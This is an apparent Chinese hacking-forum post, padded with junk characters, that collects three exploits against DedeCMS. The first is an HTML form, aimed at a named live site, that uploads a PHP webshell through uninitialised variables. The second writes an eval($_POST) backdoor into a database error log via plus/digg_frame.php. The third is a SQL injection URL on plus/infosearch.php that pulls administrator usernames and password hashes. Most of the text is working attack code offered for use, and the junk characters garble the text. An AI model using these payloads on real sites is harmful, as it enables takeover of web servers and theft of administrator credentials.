7 t% t9 u' O# {6 v, O( Q( J5 J9 b! G$ {2 h0 I
+ b$ ?3 H& Y' m, U& j+ B+ w1 R
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
+ @; R3 R- ^2 M% D- V) v<html>
" V/ N( D8 `* U# Y4 g4 _<head>
5 H1 }( K  O3 R! a8 e1 m/ c1 `<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>* v' ^, F* C) [1 N* m
</head>8 r2 ]8 ]) _% h
<body style="FONT-SIZE: 9pt">
6 }( Y. [& _) u5 Y$ k/ L, V& n---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
9 e( o+ A  K$ I! C0 N3 v/ r<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
) i/ u# f5 W: f9 ^% R9 D, G- |<input type='hidden' name='activepath' value='/data/cache/' />: B) z+ V5 s7 F6 H: |9 c
<input type='hidden' name='cfg_basedir' value='../../' />
0 y* o/ O/ e- P& m, m& T<input type='hidden' name='cfg_imgtype' value='php' />5 z) i* A( Y" d2 D+ b
<input type='hidden' name='cfg_not_allowall' value='txt' />3 h  m" r+ w0 A. ~' ]$ v" I& X
<input type='hidden' name='cfg_softtype' value='php' />- F: I5 l" R* d0 n
<input type='hidden' name='cfg_mediatype' value='php' />9 b. v) y4 m- t
<input type='hidden' name='f' value='form1.enclosure' />
% ^1 I1 v/ K( p& l% U<input type='hidden' name='job' value='upload' />/ A9 D' p$ _5 h* F6 R
<input type='hidden' name='newname' value='fly.php' />
" [. V& R  `8 t* wSelect U Shell <input type='file' name='uploadfile' size='25' />
8 W: j: V. n7 j( _<input type='submit' name='sb1' value='确定' />
  J# l" C- ~2 [1 m3 ?7 C/ }( d</form>( b- j& `; s9 f  y
<br />It's just a exp for the bug of Dedecms V55...<br />1 L7 J# S1 W- o' t
Need register_globals = on...<br />
: K- K* u+ }6 g) T6 CFun the game,get a webshell at /data/cache/fly.php...<br />
9 T' m1 r7 w  [. j9 P: O; W</body>( K  k5 K. D. o8 e4 `! m
</html>
+ z* _- h) V# N; r
) _6 [0 G6 i8 W+ R9 V2 R$ Q" H! M  V5 d
* x; N! ~! k( `+ l% ~; a$ }
4 \2 l- [& K) m& }  x9 j

( l' w7 ]. j" n. l* |1 Y
8 i( h8 D7 Y6 f: p" D' I! S' t! l/ z& O, }
& f* O* c$ s9 g3 p5 s
1 p& \, o# X2 H
1 j# ]/ y2 s* u7 N' f" l: _6 {9 K
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞5 V0 g5 u6 v0 M# h6 u
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
6 c$ k1 B# x/ \+ M1. 访问网址:2 p- z2 I+ m) |: |
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
" J0 k2 k% m8 e可看见错误信息
' b' F; _6 h) S, b/ T" _* u# |; e! M% s

* P( o9 ?4 Q  _; ?" r0 ]2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。: f0 o7 x$ P4 N0 V, A
int(3) Error: Illegal double '1024e1024' value found during parsing( [" M: a3 q) a4 ]( ~
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>; c! @0 |! w$ X
! _- _" l9 `1 _3 ^6 I8 k2 g

" I( e$ L$ v4 V' c, ^3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
& x2 K$ B5 j! k+ w
; f6 e/ B# Y  v  t$ G* U7 v0 I8 G; u7 K( o/ q
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>$ P* _  z& r7 e7 i
# @% l0 @6 O5 ]( N; I
7 u! r+ V  g) o  t0 w2 n
按确定后的看到第2步骤的信息表示文件木马上传成功., Q# s* T8 b$ R1 j' x" l( W
" y* ?1 O& U% C$ ~  A, n7 C
5 r4 A7 J, D8 t) s9 {. Q( x

4 x0 n4 Q8 g( }/ _& e$ ]9 W
* W6 o) o  N, t- f' g) ?1 W! P
6 b* N$ O3 f6 ^$ D+ J7 R8 }8 l% Q+ k2 v3 G- _% ]2 \

! U6 }+ H+ ]9 s9 h7 o
7 Y3 z( \0 n) v1 E8 i* N; f  i) A3 u) H8 O9 ]+ n

; C( D* f1 D$ g# Z2 t$ |  m- \3 a& {1 P5 R
- ]$ _" {9 C8 i
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
& l! w5 t  }7 k! |& U, xhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2